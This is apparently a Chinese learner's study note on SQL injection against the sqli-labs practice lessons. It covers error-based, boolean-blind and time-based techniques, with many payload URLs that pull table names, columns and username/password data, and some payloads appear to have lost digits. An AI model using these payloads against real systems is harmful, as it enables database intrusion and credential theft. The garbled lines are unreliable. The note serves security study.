1.爆错注入
什么情况想能使用报错注入------------页面返回连接错误信息
常用函数
updatexml()
if...floor
extractvalue
updatexml(,concat(0x23,payload,0x23),)
在concat查询语句后面添加一个标识符,如0x23
updatexml(,concat(0x23,payload,0x23),)
因为有的时候报错信息会设置长度限制,添加标识符可以避免显示不完全
获取数据库信息
http://10.1.2.5:10631/sqli/Less-1/?id=1' and updatexml(1,concat(0x23,version()),1)--+
获取表名
http://10.1.2.5:10631/sqli/Less-1/?id=1' and updatexml(1,concat(23,(select group_concat(table_name) from information_schema.tables where table_schema='security' )),1)--+
获取列名
http://test.com/sqli/Less-1/?id=1' and updatexml(1,concat(23,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)--+
获取字段内容
http://test.com/sqli/Less-1/?id=1' and updatexml(1,concat(23,(select group_concat(username,password) from users)),1)--+
(2)还有一种爆错注入
select count(*),concat(",",(select table_name from information_schema.tables where table_schema=database() limit ,),",",floor(rand()*))ldx from information_schema.tables group by ldx;
select count(*),concat(0x22,0x22,database(),0x22,0x22,floor(rand()*))ldx from information_schema.tables group by ldx
select count(*),concat(0x22,0x22,(select table_name from information_schema.tables where table_schema=database() limit ,),0x22,0x22,floor(rand()*))ldx from information_schema.tables group by ldx;
6
7 and (select 1 from (select count(*),concat(0x22,0x22,(select table_name from information_schema.tables where table_schema=database() limit 0,0),0x22,0x22,floor(rand()*2))ldx from information_schema.tables group by ldx)ldx);
http://test.com/sqli/Less-5/?id=1' and(select 1 from (select count(*),concat(0x22,0x22,(select table_name from information_schema.tables where table_schema=database() limit 2,2),0x22,0x22,floor(rand()*2))ldx from information_schema.tables group by ldx)ldx)--+
以下均摘自《代码审计:企业级Web代码安全架构》一书
1 .floor() select * from test where id= and (select from (select
count(*),concat(user(),floor(rand()*))x from information_schema.tables
group by x)a); .extractvalue() select * from test where id= and (extractvalue(,concat(0x7e,(select user()),0x7e))); .geometrycollection() select * from test where id= and geometrycollection((select * from(select * from(select user())a)b)); .exp() select * from test where id= and exp(~(select * from(select user())a)); .multipoint() select * from test where id= and multipoint((select * from(select * from(select user())a)b)) .polygon() select * from test where id= and polygon((select * from(select * from(select user())a)b)); .multipolygon() select * from test where id= and multipolygon((select * from(select * from(select user())a)b)); .linestring() select * from test where id= and linestring((select * from(select * from(select user())a)b)); .multilinestring() select * from test where id= and multilinestring((select * from(select * from(select user())a)b));
2.布尔盲注
特点:页面存在异常,但是即无回显也无报错信息利用--------------------只能通过正确与错误两种状态来判断payload是否正确
count() 计算结果集的行数。
length(str) 返回指定字符串的长度
substr(str,pos,len)/substring(str,pos,len) 返回截取的子字符串。
ascii(str) 返回指定字符串最左侧字符的sacii值。
布尔型盲注核心思想
----------------------------------------------
利用判断语句来证明推测是否正确。
推测正确时,页面正常显示;错误时,页面异常
查数据库名长度
http://10.1.2.5:10631/sqli/Less-8/?id=1' and (select length(database())>8)--+
求数据库名
http://10.1.2.5:10631/sqli/Less-8/?id=1' and ascii(substr(database(),1,1)) > 64%23
求所有表的数量
http://10.1.2.5:10631/sqli/Less-8/?id=1' and (select count(table_name) from information_schema.tables where table_schema=database()) = 5 --+
求表名长度
http://10.1.2.5:10631/sqli/Less-8/?id=1' and length((select table_name from information_schema.tables where table_schema=database())) = 5 --+
求表名的ascii值
http://10.1.2.5:10631/sqli/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101 --+
求列的数量
http://10.1.2.5:10631/sqli/Less-8/?id=1' and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3 --+
求列名的ascii值
http://10.1.2.5:10631/sqli/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1),1,1))=105 --+
求字段的数量
http://10.1.2.5:10631/sqli/Less-8/?id=1' and (select count(username) from security.users)=16 --+
求字段内容
http://10.1.2.5:10631/sqli/Less-8/?id=1' and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68 --+
3.时间盲注
时间型盲注
特点:页面不存在异常,且即无回显也无报错信息
利用:只能利用条件语句结合执行时间的长短来判断payload是否正确
-----------------------------------------------------------------------
if(exp1,exp2,exp3)
如果exp1是True,则执行exp2,否则执行exp3
-----------------------------------------------------------------------
sleep(s)
将程序暂停s秒
-----------------------------------------------------------------------
时间型盲注核心思想 if(payload,sleep(3),1)
即payload正确时,程序暂停3秒。否则立刻执行。
if(payload,1,sleep(3))
即payload正确时,程序立刻执行,否则暂停3秒。
首先闭合 然后判断是否存在时间注入----------直接在if里面插payload 套式子
http://10.1.2.5:10631/sqli/Less-10/?id=1" and sleep(5)--+
查数据库名长度
1 http://test.com/sqli/Less-1/?id=1' and if(length(database())=8,sleep(2),1)-- -
求数据库名的ascii值
1 http://test.com/sqli/Less-1/?id=1' and if(ascii(substr(database(),1,1)) =115,sleep(2),1)--+
感觉今天学的东西真的挺多的,幸好有点基础不然懵了,先整理到这把,占坑在补上。先上个ascii码表把。
看了tony表哥一篇帖子,记下关于时间盲注的新理解
or,and的执行用短位运算符来说明准确简单点.短运算符的精髓:条件一 and 条件二 //当条件一成立,执行条件二条件一 or 条件二 //当条件一不成立,执行条件二